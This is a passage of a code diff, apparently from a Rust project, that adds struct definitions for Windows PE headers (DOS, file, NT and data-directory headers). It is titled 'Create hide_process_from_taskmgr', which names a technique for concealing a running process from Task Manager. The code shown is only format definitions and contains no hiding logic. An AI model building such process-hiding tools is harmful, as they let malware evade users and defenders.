1005	+	BoundImport: IMAGE_DATA_DIRECTORY,
1006	+
1007	+	IAT: IMAGE_DATA_DIRECTORY,
1008	+
1009	+	DelayImportDescriptor: IMAGE_DATA_DIRECTORY,
1010	+	CLRRuntimeHeader: IMAGE_DATA_DIRECTORY,
1011	+
1012	+	Reserved: IMAGE_DATA_DIRECTORY,
1013	+	}
1014	+
1015	+	#[derive(Debug, Default, Clone)]
1016	+	#[repr(C)]
1017	+	pub struct IMAGE_FILE_HEADER {
1018	+	Machine: u16,
1019	+	NumberOfSections: u16,
1020	+	TimeDateStamp: u32,
1021	+	PointerToSymbolTable: u32,
1022	+	NumberOfSymbols: u32,
1023	+	SizeOfOptionalHeader: u16,
1024	+	Characteristics: u16,
1025	+	}
1026	+
1027	+	#[derive(Debug, Default, Clone)]
1028	+	#[repr(C)]
1029	+	pub struct IMAGE_DATA_DIRECTORY {
1030	+	VirtualAddress: u32,
1031	+	Size: u32,
1032	+	}
1033	+
1034	+	#[derive(Debug, Default, Clone)]
1035	+	#[repr(C)]
1036	+	pub struct IMAGE_NT_HEADERS32 {
1037	+	Signature: u32,
1038	+
1039	+	FileHeader: IMAGE_FILE_HEADER,
1040	+
1041	+	OptionalHeader: IMAGE_OPTIONAL_HEADER32,
1042	+	}
1043	+
1044	+	#[derive(Debug, Default, Clone)]
1045	+	#[repr(C)]
1046	+	pub struct IMAGE_NT_HEADERS64 {
1047	+	Signature: u32,
1048	+
1049	+	FileHeader: IMAGE_FILE_HEADER,
1050	+
1051	+	OptionalHeader: IMAGE_OPTIONAL_HEADER64,
1052	+	}
1053	+
1054	+	#[derive(Debug, Default, Clone)]
1055	+	#[repr(C)]
1056	+
1057	+	pub struct IMAGE_DOS_HEADER {
1058	+	e_magic: [u8; 2], // Magic number
1059	+	e_cblp: u16, // Bytes on last page of file
1060	+	e_cp: u16, // Pages in file
1061	+	e_crlc: u16, // Relocations
1062	+	e_cparhdr: u16, // Size of header in paragraphs
1063	+	e_minalloc: u16, // Minimum extra paragraphs needed
1064	+	e_maxalloc: u16, // Maximum extra paragraphs needed
1065	+	e_ss: u16, // Initial (relative) SS value
1066	+	e_sp: u16, // Initial SP value
1067	+	e_csum: u16, // Checksum
1068	+	e_ip: u16, // Initial IP value
1069	+	e_cs: u16, // Initial (relative) CS value
1070	+	e_lfarlc: u16, // File address of relocation table
1071	+	e_ovno: u16, // Overlay number
1072	+	e_res1: [u16; 4], // Reserved words
1073	+	e_oemid: u16, // OEM identifier (for e_oeminfo)
1074	+	e_oeminfo: u16, // OEM information, e_oemid specific
1075	+	e_res2: [u16; 10], // Reserved words
1076	+	e_lfanew: i32, // File address of new exe header
1077	+	}
1078	+
1079	+
1080	+
1081	+

Create hide_process_from_taskmgr